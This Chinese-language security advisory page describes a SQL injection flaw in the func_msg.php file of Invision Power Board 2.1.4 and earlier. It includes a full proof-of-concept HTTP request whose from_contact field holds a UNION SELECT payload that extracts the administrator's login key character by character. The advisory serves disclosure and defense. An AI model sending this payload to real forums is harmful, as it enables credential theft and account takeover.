⊙ 在线帮助
⊙ 添加收藏
⊙ 网站地图
最新资讯
技术中心
下载园地
漏洞总汇
在线书籍
X-档案
法规标准
技术论坛
 您现在的位置 >> 首页 >> 漏洞总汇 >> 程序脚本 >> bbs
 
 
Invision Power Board func_msg.php远程SQL注入漏洞
【责 编】:AcOol
【作 者】:不详		 【添 加】:2006-4-28
【更 新】:2006-4-28
【出 处】:绿盟科技
【字 体】:[   ]		 【浏 览】:
受影响系统: 
Invision PS Invision Board <= 2.1.4
描述:
BUGTRAQ  ID: 17719

Invision Power Board是一款流行的PHP论坛程序。

Invision Power Board的func_msg.php第448行存在SQL注入漏洞。to_by_id没有经过正确的过滤便通过messenger类实例从ipd过滤的输入数组传送给了类,因此攻击者可以操控SQL查询,执行任意代码。

<*来源:satanchild123 (satanchild123@hotmail.com
  
  链接:http://secunia.com/advisories/19861/print/
        http://marc.theaimsgroup.com/?l=bugtraq&m=114617008006860&w=2
*>
测试:
Host: localhost
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060405 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en,en-us;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.example.com/ipb/index.php?act=msg
Cookie: bbmode=0; member_id=1; forum_read=a%3A1%3A%7Bi%3A2%3Bi%3A1146068785%3B%7D; pass_hash=c0a4d27ac2c36ef6fe25d27c5c0f3b17;
session_id=9dd0de2c068478414d8e7bae7790ce46; ipb-myass-div=310,109
Content-Type: application/x-www-form-urlencoded
Content-Length: 438

removeattachid=0&amp;OID=&amp;act=Msg&amp;CODE=04&amp;MODE=01&amp;post_key=1f40fdcbdc94fc9c1a402e2019f2b314&amp;auth_key=bcb2b3362c8fa575e58cd376ab4fb6be&amp;MAX_FILE_SIZE=51200000&amp;
entered_name=asdfasdfasdf&amp;carbon_copy=&amp;msg_title=asdfasdfasdf&amp;ffont=0&amp;fsize=0&amp;Post=asdfasdfasdfasdfasdf&amp;from_contact=-1+UNION+SELECT+0%2C+CHAR%28110%2C11
7%2C116%2C105%2C99%2C117%2C108%2C117%2C115%29+FROM+ibf_members+WHERE+id%3D1+AND+MID%28member_login_key%2C+2%2C+1%29+%3D+CHAR%2848%29
建议:
厂商补丁:

Invision PS
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.invisionboard.com/
·本站特别声明不要转载或作者授权本站独家播发的文章,请勿转载。
·本站原创文章可自由转载,但本站作者及本站链接必须保留。
·非本站原创文章可自由转载,请按作者及文章出处一节,自行链接。
·转载之图片、文件,链接请不要盗链到本站,且不准打上各自站点的水印,亦不能抹去我站点水印。

+ 本站推荐 +
·BlackICE文件锁定保护绕过漏洞
·Apache mod_tcl远程格式串处理
·phpBB Security phpbb_securit
·phpBB PlusXL phpbb_root_path
·phpBB Archive for Search Eng
+ 相关漏洞 +
·phpBB Security phpbb_securit
·phpBB PlusXL phpbb_root_path
·phpBB Archive for Search Eng
·MyBB navbits[][name]变量跨站
·Lussumo Vanilla RootDirector
+ 热点漏洞 +
·动网论坛(DVBBS 7.1.0 SP1)Sav
·Microsoft IE JavaScript OnLo
·Microsoft Windows Media Play
·RARLAB WinRAR命令行处理溢出漏
·Symantec Antivirus 远程堆栈溢
+ 本站发布 +
 
 
关于站点 | 免责申明 | 版权隐私 | 业务合作 | 提供捐助 | 联系我们 Copyright © 2001-2005 CoolerSky. All Rights Reserved.